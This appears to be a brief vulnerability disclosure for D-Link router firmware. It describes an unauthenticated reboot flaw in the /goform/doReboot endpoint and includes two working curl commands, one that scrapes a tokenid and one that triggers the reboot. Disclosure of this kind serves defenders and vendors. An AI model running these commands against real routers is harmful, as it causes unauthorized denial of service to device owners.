-
Manufacturer's address:https://www.dlink.com/
-
Firmware download address : http://tsd.dlink.com.tw/GPL.asp
The picture above shows the latest firmware for this version
Vulnerability occurs in /goform/doReboot , No authentication is required, and reboot is executed when the function returns at the end
The first thing you need to do is to get the tokenid
curl http://192.168.0.1/dir_login.asp | grep tokenid
Then run the following poc
curl -i -X POST http://192.168.0.1/goform/doReboot -d tokenid=xxxx
The router will then reboot